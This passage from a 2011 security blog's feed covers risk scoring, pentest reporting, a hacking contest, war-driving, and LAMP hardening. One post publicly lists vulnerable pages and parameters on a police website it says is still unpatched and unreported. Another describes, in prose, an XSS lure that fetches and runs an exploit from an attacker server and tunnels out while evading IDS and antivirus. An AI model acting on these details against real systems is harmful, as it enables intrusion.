&lt;p&gt;&lt;a name="SPELLING_ERROR_448"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_449"&gt;&lt;/a&gt; 			&lt;span style="color: rgb(255, 255, 255);font-family:Times New Roman,serif;" &gt;&lt;span style="font-size:100%;"&gt;1 - Very Low&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 		&lt;td valign="top" width="255"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_451"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_452"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_453"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_454"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_455"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_456"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_457"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_458"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_459"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_460"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_461"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_462"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_463"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_464"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_465"&gt;&lt;/a&gt; 			&lt;span style="color: rgb(255, 255, 255);font-family:Times New Roman,serif;" &gt;&lt;span style="font-size:100%;"&gt;May affect a very 			small and localized part of the organization’s business and 			losses will be minimal&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 	&lt;/tr&gt; &lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;So now we can multiply the values to calculate the PSR of an asset after we have defined them.&lt;br /&gt;&lt;br /&gt;	&lt;meta equiv="CONTENT-TYPE" content="text/html; charset=utf-8"&gt; 	&lt;title&gt;&lt;/title&gt; 	&lt;meta name="GENERATOR" content="OpenOffice.org 3.3  (Linux)"&gt; 	&lt;style type="text/css"&gt; 	&lt;!-- 		@page { margin: 0.79in } 		TD P { margin-bottom: 0in } 		P { margin-bottom: 0.08in } 	--&gt; 	&lt;/style&gt;  &lt;table border="1" bordercolor="#000000" cellpadding="7" cellspacing="0" width="388"&gt; 	&lt;col width="103"&gt; 	&lt;col width="255"&gt; 	&lt;tbody&gt;&lt;tr valign="top"&gt; 		&lt;td bgcolor="#bfbfbf" width="103"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_486"&gt;&lt;/a&gt;&lt;span style="color: rgb(255, 102, 102);font-family:Times New Roman,serif;" &gt;&lt;span style="font-size:100%;"&gt;&lt;b&gt;Risk 			Level&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 		&lt;td bgcolor="#bfbfbf" width="255"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_488"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_489"&gt;&lt;/a&gt; 			&lt;span style="color: rgb(255, 102, 102);font-family:Times New Roman,serif;" &gt;&lt;span style="font-size:100%;"&gt;&lt;b&gt;Possible PSR 			Values&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 	&lt;/tr&gt; 	&lt;tr valign="top"&gt; 		&lt;td width="103"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_491"&gt;&lt;/a&gt;&lt;span style="font-family:Times New Roman,serif;"&gt;&lt;span style="font-size:100%;"&gt;Very 			Low&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 		&lt;td width="255"&gt; 			&lt;p&gt;&lt;span style="font-family:Times New Roman,serif;"&gt;&lt;span style="font-size:100%;"&gt;1, 2, 3, 4, 5, 			6&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 	&lt;/tr&gt; 	&lt;tr valign="top"&gt; 		&lt;td width="103"&gt; 			&lt;p&gt;&lt;span style="font-family:Times New Roman,serif;"&gt;&lt;span style="font-size:100%;"&gt;Low&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 		&lt;td width="255"&gt; 			&lt;p&gt;&lt;span style="font-family:Times New Roman,serif;"&gt;&lt;span style="font-size:100%;"&gt;8, 9, 10, 12, 			15, 16&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 	&lt;/tr&gt; 	&lt;tr valign="top"&gt; 		&lt;td width="103"&gt; 			&lt;p&gt;&lt;span style="font-family:Times New Roman,serif;"&gt;&lt;span style="font-size:100%;"&gt;Medium&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 		&lt;td width="255"&gt; 			&lt;p&gt;&lt;span style="font-family:Times New Roman,serif;"&gt;&lt;span style="font-size:100%;"&gt;18, 20, 24, 			25, 27, 30&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 	&lt;/tr&gt; 	&lt;tr valign="top"&gt; 		&lt;td width="103"&gt; 			&lt;p&gt;&lt;span style="font-family:Times New Roman,serif;"&gt;&lt;span style="font-size:100%;"&gt;High&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 		&lt;td width="255"&gt; 			&lt;p&gt;&lt;span style="font-family:Times New Roman,serif;"&gt;&lt;span style="font-size:100%;"&gt;32, 36, 40, 			45, 48, 50&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 	&lt;/tr&gt; 	&lt;tr valign="top"&gt; 		&lt;td width="103"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_496"&gt;&lt;/a&gt;&lt;span style="font-family:Times New Roman,serif;"&gt;&lt;span style="font-size:100%;"&gt;Very 			High&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 		&lt;td width="255"&gt; 			&lt;p&gt;&lt;span style="font-family:Times New Roman,serif;"&gt;&lt;span style="font-size:100%;"&gt;60, 64, 75, 			80, 100, 125&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 	&lt;/tr&gt; &lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;	&lt;meta equiv="CONTENT-TYPE" content="text/html; charset=utf-8"&gt; 	&lt;title&gt;&lt;/title&gt; 	&lt;meta name="GENERATOR" content="OpenOffice.org 3.3  (Linux)"&gt; 	&lt;style type="text/css"&gt; 	&lt;!-- 		@page { margin: 0.79in } 		P { margin-bottom: 0.08in } 	--&gt; 	&lt;/style&gt;  &lt;p style="background: rgb(255, 255, 255) none repeat scroll 0% 0%; margin-bottom: 0in; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"&gt;&lt;a name="SPELLING_ERROR_498"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_499"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_500"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_501"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_502"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_503"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_504"&gt;&lt;/a&gt; &lt;span style="font-family:Times New Roman,serif;"&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="color: rgb(255, 0, 0); font-weight: bold;"&gt;So all the PSR calculation sum up to 125&lt;/span&gt;. &lt;/span&gt;&lt;/span&gt; &lt;/p&gt; ./Chucks&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-7877009076125020841?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/7877009076125020841/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=7877009076125020841' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/7877009076125020841'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/7877009076125020841'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2011/08/calculating-psr-and-reason-to.html' title='Calculating PSR and the Reason to'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-4709334703367734104</id><published>2011-07-30T15:48:00.003+03:00</published><updated>2011-07-30T15:52:52.610+03:00</updated><title type='text'>Vulnerability and PT reporting</title><content type='html'>Lately i have been engaged with alot of Assessments, and reporting has been a major factor for the Clients bosses upstairs. So reporting is one thing that techis always hate doing, which i do too, but for the sake of these non-technical folks we need to make sure reports are done and well interpreted to the point they understand it even before a presentation.&lt;br /&gt;&lt;br /&gt;Now, the reporting matrix should atleast be on color indexing and good diagrams, even if it means to use some Visio to draw how an attacker would penetrate from the Internal or External attack. Terms like Ease of Exploitation, Potential Impact, Ease of Identification helps the management to know the overall risk of the vulnerability and how to fix it, with its criticality associated.&lt;br /&gt;&lt;br /&gt;Sometimes departments involved in fixing the problem or vulnerability tend to overstate the issue or deny its capability so at to drag the whole assessments or not look bad to the management, so the evidence has to be well shown, and illustrated.&lt;br /&gt;&lt;br /&gt;The methodology used, and type of tools and timelines are also important aspects. The message has to be clear and to the point.&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-4709334703367734104?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/4709334703367734104/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=4709334703367734104' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/4709334703367734104'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/4709334703367734104'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2011/07/vulnerability-and-pt-reporting.html' title='Vulnerability and PT reporting'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-1370004957842808538</id><published>2011-04-13T11:17:00.003+03:00</published><updated>2011-04-13T12:06:03.404+03:00</updated><title type='text'>BELATED HACKBATTLE 2010</title><content type='html'>The dates for the belated Hackbattle2010 have been set, as from&lt;br /&gt;25th to 29th of April and 30th will be the presentation dates. We will&lt;br /&gt;have hackbattle 2011 at the end of the year.&lt;br /&gt;&lt;br /&gt;The scenario will be two servers Natted to an FW on public IPs, and&lt;br /&gt;two workstations behind the DMZ. The registered guys will have to hack&lt;br /&gt;their way into the network, and collected files, they will be asked&lt;br /&gt;with the right MD5 checksums. The first collector of all checksums,&lt;br /&gt;from both servers and one workstation, will be the winner of the&lt;br /&gt;contest.&lt;br /&gt;&lt;br /&gt;To register, send email to &lt;a href="http://hackbattle.ke/" target="_blank"&gt;hackbattle.ke&lt;/a&gt; at &lt;a href="http://gmail.com/" target="_blank"&gt;gmail.com&lt;/a&gt;, with your name,&lt;br /&gt;the hacker handle that you will want to use. and the IP range.&lt;br /&gt;&lt;br /&gt;The contest is hosted by ihub, so all sponsors will be needed to&lt;br /&gt;contact Bernard Owuor Adongo &lt;bernard at="" mlab="" co="" d0t="" ke=""&gt;, and also&lt;br /&gt;me with jgichuki at inbox d0t com. For those who had already asked&lt;br /&gt;about the sponsorship, i will be sending you the information later in&lt;br /&gt;the day.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Rules:&lt;br /&gt;&lt;br /&gt;1. Any techi involved with the infrastructure set up will be&lt;br /&gt;disqualified for the contest&lt;br /&gt;2. Every registered techi will be needed to have a full report of his actions&lt;br /&gt;3. Any changes of the file to mess up with the checksum, will be&lt;br /&gt;considered as a disqualification.&lt;br /&gt;4. Any type of DOS will have your IPs blocked&lt;br /&gt;5. Teamwork is allowed, but remember you will have to share the prizes&lt;br /&gt;6. Winners will have to show how they hacked on 30th, in ihub just&lt;br /&gt;before the Ubuntu party.&lt;br /&gt;7. The registration will only be allowed from EAC members.&lt;br /&gt;8. Trying to social engineer moderators will be considered as a cool&lt;br /&gt;9. How to win, hack the infrastructure the fastest&lt;br /&gt;&lt;br /&gt;Remember, &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="font-weight: bold;"&gt;ANY ACTIONS OUTSIDE OF THESE RULES WILL RESULT IN DISQUALIFICATION&lt;/span&gt;.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Yours,&lt;br /&gt;&lt;br /&gt;./Chucks&lt;br /&gt;&lt;/bernard&gt;&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-1370004957842808538?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/1370004957842808538/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=1370004957842808538' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/1370004957842808538'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/1370004957842808538'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2011/04/belated-hackbattle-2010.html' title='BELATED HACKBATTLE 2010'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-3624008413337885596</id><published>2011-03-06T21:34:00.008+03:00</published><updated>2011-03-07T17:19:21.753+03:00</updated><title type='text'>KenyaPolice Website Vulnerabilities</title><content type='html'>So,  a new post showed up on Security list about how to get the relevant personnel know about the vulnerabilities that KP Website would be having. http://lists.my.co.ke/pipermail/security/2011-March/001725.html&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/-6snSwuoTPz4/TXPcXxEqg7I/AAAAAAAAAdY/qOrJQPlS8HM/s1600/kp.jpg"&gt;&lt;img style="cursor: pointer; width: 400px; height: 140px;" src="http://3.bp.blogspot.com/-6snSwuoTPz4/TXPcXxEqg7I/AAAAAAAAAdY/qOrJQPlS8HM/s400/kp.jpg" alt="" id="BLOGGER_PHOTO_ID_5581046664110179250" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;If you check for obvious vulnerabilities with your browser e.g Cross Site scripting, SQL Injection, hidden directories, its much easier with lack of WAF (Web Application Firewall), and bad coding tactics.&lt;br /&gt;&lt;br /&gt;With such obvious flaws, we can actually get a sense of how Government infrastructure is, and how vulnerable applications running confidential information are, e.g Civil Servant information, NSSF information, Health Organization, Ongoing Corruption investigations etc. With such information being in susceptible vulnerable infrastructures, in case of a cyber attack, its would be easy to overwhelm and bypass the Governments intergrity and confidentiality.&lt;br /&gt;&lt;br /&gt;Back to KP website, pages like report_a_crime.asp, lost.asp, site_search.asp, crime_reports_processor.asp, contactus.asp and several others are vulnerable to serious security flaws, especial the Top Ten Owasp Risks. This is due to non-sanitized pages with page variables like, category, details, name, email_address, telephone, txtAnswer etc.&lt;br /&gt;&lt;br /&gt;Security Assessments for Kenyan Goverment Infrastracture should be enforced, and use of Information Security Policies should be introduced. MOD or any other law enforcement organization should at least have a Task Force that does tests once in a while by assuming cyber attacks, and such common vulnerabilities on KP webserver should no longer exist (very embarrasing flaws).&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0); font-weight: bold;"&gt;NB, i have not disclosed to anyone how to inject or exploit these vulnerabilities, KP has not been informed yet, so the site is still vulnerable. Please also note that, any information i have shown here should NOT be misused, if so, use at your own risk.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Posted by Chucks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-3624008413337885596?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/3624008413337885596/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=3624008413337885596' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/3624008413337885596'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/3624008413337885596'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2011/03/kenya-police-website-obvious.html' title='KenyaPolice Website Vulnerabilities'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-6snSwuoTPz4/TXPcXxEqg7I/AAAAAAAAAdY/qOrJQPlS8HM/s72-c/kp.jpg' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-234732427225174003</id><published>2011-03-03T20:18:00.005+03:00</published><updated>2011-03-03T21:02:58.541+03:00</updated><title type='text'>Nairobi War-Drives</title><content type='html'>Its been long since i did some war driving in Nairobi.&lt;br /&gt;&lt;br /&gt;So this weekend, am planning to start with Upperhill to Hurligham looking for WEP and Open wireless Access points. &lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/-8Y4lcqQNVzo/TW_W_lMLUfI/AAAAAAAAAdQ/rxXoc2dQ-iA/s1600/wireless.png"&gt;&lt;img style="cursor: pointer; width: 100px; height: 100px;" src="http://3.bp.blogspot.com/-8Y4lcqQNVzo/TW_W_lMLUfI/AAAAAAAAAdQ/rxXoc2dQ-iA/s400/wireless.png" alt="" id="BLOGGER_PHOTO_ID_5579914851138621938" border="0" /&gt;&lt;/a&gt;If you wonna join in please shot me a mail jgichuki at inbox d0t com.&lt;br /&gt;&lt;br /&gt;We may also do some wireless pentest to show risks to the public and why insecure wireless can be a external threat to your organization.&lt;br /&gt;&lt;br /&gt;Keep tuned in,&lt;br /&gt;&lt;br /&gt;./Chucks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-234732427225174003?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/234732427225174003/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=234732427225174003' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/234732427225174003'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/234732427225174003'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2011/03/nairobi-war-drives.html' title='Nairobi War-Drives'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-8Y4lcqQNVzo/TW_W_lMLUfI/AAAAAAAAAdQ/rxXoc2dQ-iA/s72-c/wireless.png' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-1047775468151736319</id><published>2011-02-17T01:29:00.019+03:00</published><updated>2011-02-17T13:48:17.970+03:00</updated><title type='text'>Why PT without FW/IPS Evasion is not reliable Part 2</title><content type='html'>So, part 2 is here, i have received several mails to blog on this.&lt;br /&gt;&lt;br /&gt;This attack is simulated with a Cross Site Scripting vulnerability, example www.bank.co.ke. So what happens is the attacker discovers a flaw on the website where user inputs are not sanitized. Www.bank.co.ke, sits in the banks Server Farm, inside the DMZ well protected by the Cooperate Firewall. In the Server farm are DB servers, Mails Servers, Domain servers and the Web server etc.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/-o2Jox4cVbTo/TVxP7b9W6xI/AAAAAAAAAc4/03dqbKycOO8/s1600/moredetailed_on_xss.jpg"&gt;&lt;img style="cursor: pointer; width: 399px; height: 250px;" src="http://2.bp.blogspot.com/-o2Jox4cVbTo/TVxP7b9W6xI/AAAAAAAAAc4/03dqbKycOO8/s400/moredetailed_on_xss.jpg" alt="" id="BLOGGER_PHOTO_ID_5574418321313819410" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;So what happens is the hackers injects code into the website and convinces a techi support user to check the link out. The link has full website address, but the other injection parts are encoded for disguise, and the IDPS (Intrusion Detection Prevension System) sensors does not pick that when going to his email.&lt;br /&gt;&lt;br /&gt;The attacker has a remote zombie which has an exe embedded to a js script, so he will send an encode format of an url that sounds like below (this needs to be encoded to bypass Intrusion sensors and filters)&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/-tG-RLDDc4S0/TVzsz8N0dXI/AAAAAAAAAdA/5RVV01Tk-AE/s1600/xxinjection.jpg"&gt;&lt;img style="cursor: pointer; width: 417px; height: 31px;" src="http://2.bp.blogspot.com/-tG-RLDDc4S0/TVzsz8N0dXI/AAAAAAAAAdA/5RVV01Tk-AE/s400/xxinjection.jpg" alt="" id="BLOGGER_PHOTO_ID_5574590815859406194" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;The character // --&gt; is meant to comment out anything that gets generated up to that point. Then we have the next step of the payload where a script is hosted on attacking server which has the exploit ready for the client. Its downloaded and is executed on the Users PC. From there, we have an &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_0"&gt;SSLED&lt;/span&gt; tunnel, from inside cooperate LAN to zombie server via a command prompt. So the attacker can control the PC from his laptop via the zombie through a tunnel which is not detected at the &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_1"&gt;FW&lt;/span&gt; and &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_2"&gt;IDPS&lt;/span&gt; centre.&lt;br /&gt;There is so many other ways to inject malicious code on websites, which can fully trick users to engage with the exploits without their will. These attacks will need to be obfuscated to avoid &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_3"&gt;AVs&lt;/span&gt; and Intrusion Sensors&lt;br /&gt;&lt;br /&gt;Questions and comments can be done below. If you wish to know how far more the exploitation can go, please comment or mail me, i will be happy to recreate a full post as part 3.&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-1047775468151736319?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/1047775468151736319/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=1047775468151736319' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/1047775468151736319'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/1047775468151736319'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2011/02/why-pt-without-fwips-evasion-is-not.html' title='Why PT without FW/IPS Evasion is not reliable Part 2'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/-o2Jox4cVbTo/TVxP7b9W6xI/AAAAAAAAAc4/03dqbKycOO8/s72-c/moredetailed_on_xss.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-9116049723890504521</id><published>2011-02-16T19:06:00.009+03:00</published><updated>2011-02-16T22:20:51.851+03:00</updated><title type='text'>Yes, An old Friend scanned the site...</title><content type='html'>Was with one of my friends the other day and he had just set up a financial website, and he was telling me that they will be doing serious stuff with several Financial institutions all over Africa.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/-5L0NnFxQLv4/TVv3DhZOPlI/AAAAAAAAAcw/Sqr2aFiadZI/s1600/scanasite.jpg"&gt;&lt;img style="cursor: pointer; width: 181px; height: 218px;" src="http://2.bp.blogspot.com/-5L0NnFxQLv4/TVv3DhZOPlI/AAAAAAAAAcw/Sqr2aFiadZI/s400/scanasite.jpg" alt="" id="BLOGGER_PHOTO_ID_5574320603676950098" border="0" /&gt;&lt;/a&gt;So the discussion about security came up, and boldly said, "Old Friend from India did a Penetration Test on it by, scanning it, now its safe and secure" So he actually did not even do this for his comfort but wanted to pass Compliance test from some banks and CBK. I don't like pointing fingers, but i think the CBK, should also regulate how such Assessment and Audits  are done. CBK should update their mandate on such matters.&lt;br /&gt;&lt;br /&gt;So the box , LAMPs, several organizations use, has several vulnerabilities or rather non-hardened LAMPs. Hackers will always look for such default installs and if found will probe for more information and use such intel to exploit further, especially if they see a gain, financially or Infrastructure-wise. So lets look at a few tips on how to harden the LAMPs. These tips are just 10% of what you should do to protect a LAMP. Otherwise, if they have not been done, you have a 0% security on your webserver.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;HIDE YOU APACHE &amp;amp; PHP INFORMATION.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;No one needs to know which version of apache or php your are running, when browing your site, except hackers. So inside httpd.conf, change the ServerSignature from On to Off. Below there is ServerTokens, change from OS to PROD. Also inside php.ini file, there is expose_php which is on, turn it off, also change SafeMode to ON from Off. There are also some dangerous configurations which need to be turned off, in disable_functions=&lt;br /&gt;&lt;br /&gt;After that restart Apache.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;INSTALL WEB APPLICATION FIREWALL.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;You will need to install a WAF, to protect against online login bruteforces, web directory bruteforce, and other forms of attacks. PHPIDS is another solution which needs to be installed. PHPIDS is capable of detecting attacking pattern strings, e.g File Inclusions either remote or local attacks, SQLIs, XSS etc.&lt;br 